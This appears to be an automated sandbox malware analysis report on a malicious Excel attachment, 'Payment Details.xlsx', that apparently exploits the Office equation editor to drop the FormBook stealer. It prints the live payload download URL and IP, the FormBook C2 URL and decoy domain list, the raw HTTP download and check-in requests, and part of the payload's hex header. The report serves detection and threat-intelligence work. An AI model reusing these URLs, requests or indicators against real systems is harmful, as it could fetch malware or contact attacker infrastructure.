Windows Analysis Report Payment Details.xlsx

AV Detection:

Found malware configuration

Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.blancheshelley.xyz/g2fg/"], "decoy": ["snowcrash.website", "pointman.us", "newheartvalve.care", "drandl.com", "sandspringsramblers.com", "programagubernamental.online", "boja.us", "mvrsnike.com", "mentallyillmotherhood.com", "facom.us", "programagubernamental.store", "izivente.com", "roller-v.fr", "amazonbioactives.com", "metaverseapple.xyz", "5gt-mobilevsverizon.com", "gtwebsolutions.co", "scottdunn.life", "usdp.trade", "pikmin.run", "cardano-dogs.com", "bf2hgfy.xyz", "teslafoot.com", "rubertquintana.com", "wellsfargroewards.com", "santel.us", "couponatonline.com", "theunitedhomeland.com", "pmstnly.com", "strlocal.com", "shelleysmucker.com", "youser.online", "emansdesign.com", "usnikeshoesbot.top", "starfish.press", "scotwork.us", "metamorgana.com", "onyxbx.net", "rivas.company", "firstcoastalfb.com", "onpurposetraumainformedcare.com", "celimot.xyz", "jecunikepemej.rest", "lenovolatenightit.com", "unitedsterlingcompanyky.com", "safety2venture.us", "facebookismetanow.com", "scottdunn.review", "mentallyillmotherhood.com", "firstincargo.com", "vikavivi.com", "investmenofpairs.club", "nexans.cloud", "farcloud.fr", "ivermectinforhumans.quest", "5gmalesdf.sbs", "majenta.info", "6vvvvvwmetam.top", "metafirstclass.com", "firstcoinnews.com", "btcetffutures.online", "funinfortmyers.com", "mangoirslk.top", "metaversebasicprivacy.com"]}

Multi AV Scanner detection for submitted file

Source: Payment Details.xlsx	Virustotal: Detection: 36%			Perma Link
Source: Payment Details.xlsx	ReversingLabs: Detection: 33%

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://202.55.132.154/384500000_1/vbc.exe	Avira URL Cloud: Label: malware
Source: www.blancheshelley.xyz/g2fg/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: http://202.55.132.154/384500000_1/vbc.exe	Virustotal: Detection: 12%			Perma Link
Source: www.blancheshelley.xyz/g2fg/	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe	ReversingLabs: Detection: 50%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 50%

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.vbc.exe.706380.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 9.2.vbc.exe.30000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 9.0.vbc.exe.400000.10.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
Source:	Binary string: rundll32.pdb source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp

Spreading:

Enumerates the file system

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini			Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.metafirstclass.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.128.23.153 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.metafirstclass.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.blancheshelley.xyz/g2fg/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DOSARRESTUS DOSARRESTUS
Source: Joe Sandbox View	ASN Name: ADTEC-AS-VNADTECMediaJointStockCompanyVN ADTEC-AS-VNADTECMediaJointStockCompanyVN

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.128.23.153 52.128.23.153
Source: Joe Sandbox View	IP Address: 202.55.132.154 202.55.132.154

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:29:20 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:42:24 GMTETag: "b0a00-5d19599d2da5b"Accept-Ranges: bytesContent-Length: 723456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 14 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 0a 00 00 0a 00 00 00 00 00 00 7e 1d 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 1d 0b 00 4f 00 00 00 00 20 0b 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc fd 0a 00 00 20 00 00 00 fe 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 20 0b 00 00 08 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 08 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1d 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b0 21 01 00 03 00 00 00 8c 01 00 06 5c 6a 02 00 d0 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154
Source: unknown	TCP traffic detected without corresponding DNS query: 202.55.132.154

Found strings which match to known social media urls

Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: schtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emf

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.metafirstclass.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
